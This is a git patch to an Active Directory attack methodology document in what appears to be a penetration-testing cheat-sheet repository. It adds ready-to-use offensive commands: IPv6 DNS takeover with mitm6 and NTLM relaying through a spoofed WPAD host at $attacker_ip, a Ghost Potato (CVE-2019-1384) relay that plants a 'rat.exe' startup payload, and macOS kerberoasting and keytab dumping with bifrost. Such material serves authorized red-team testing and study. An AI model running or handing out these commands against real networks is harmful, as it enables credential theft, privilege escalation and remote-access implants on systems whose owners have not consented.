From 7f266bfda8bfc7ec88cb4bc861478577ced5c9df Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 14 Nov 2019 23:26:13 +0100
Subject: [PATCH] mitm ipv6 + macOS kerberoasting

---
 .../Active Directory Attack.md | 48 ++++++++++++++++++-
 1 file changed, 46 insertions(+), 2 deletions(-)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 9730f3d..0072eeb 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -24,8 +24,10 @@
  * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
  * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
  * [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
- * [SMB Signing Disabled](#smb-signing-disabled)
+ * [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
+ * [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
  * [Drop the MIC](#drop-the-mic)
+ * [Ghost Potato](#ghost-potato)
  * [SCF file attack against writeable share](#scf-file-attack-against-writeable-share)
  * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
  * [Trust relationship between domains](#trust-relationship-between-domains)
@@ -64,6 +66,7 @@
 * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
 ```bash
+ apt-get install -y libssl-dev libffi-dev python-dev build-essential
 git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
 crackmapexec smb -L
 crackmapexec smb -M name_module -o VAR=DATA
@@ -554,6 +557,12 @@ Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
 .\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt
 ```
+Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-feature/bifrost)
+
+```powershell
+./bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/dc1-lab.lab.local -kerberoast true
+```
+
 Then crack the ticket with hashcat or john
 ```powershell
@@ -715,7 +724,7 @@ msf > use exploit/windows/smb/smb_relay
 msf exploit(smb_relay) > show targets
 ```
-#### SMB Signing Disabled
+#### SMB Signing Disabled and IPv4
 If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.
@@ -749,6 +758,23 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
 $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
 ```
+
+#### SMB Signing Disabled and IPv6
+
+Since MS16-077 the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
+
+```powershell
+cme smb $hosts --gen-relay-list relay.txt
+
+# DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6
+mitm6 -i eth0 -d $domain
+
+# spoofing WPAD and relaying NTLM credentials
+http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
+or
+http://ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
+```
+
 #### Drop the MIC
 > The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP 
@@ -781,6 +807,18 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
 secretsdump.py -k -no-pass second-dc-server.local -just-dc
 ```
+#### Ghost Potato - CVE-2019-1384
+
+Prerequisites:
+* User must be a member of the local Administrators group
+* User must be a member of the Backup Operators group
+* Token must be elevated
+
+Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impacket-ghostpotato.zip
+
+```powershell
+ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe
+```
 ### SCF file attack against writeable share
@@ -1109,6 +1147,12 @@ $ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab
 [...]
 ```
+On macOS you can use `bifrost`.
+
+```powershell
+./bifrost -action dump -source keytab -path test
+```
+
 Connect to the machine using the account and the hash with CME.
 ```powershell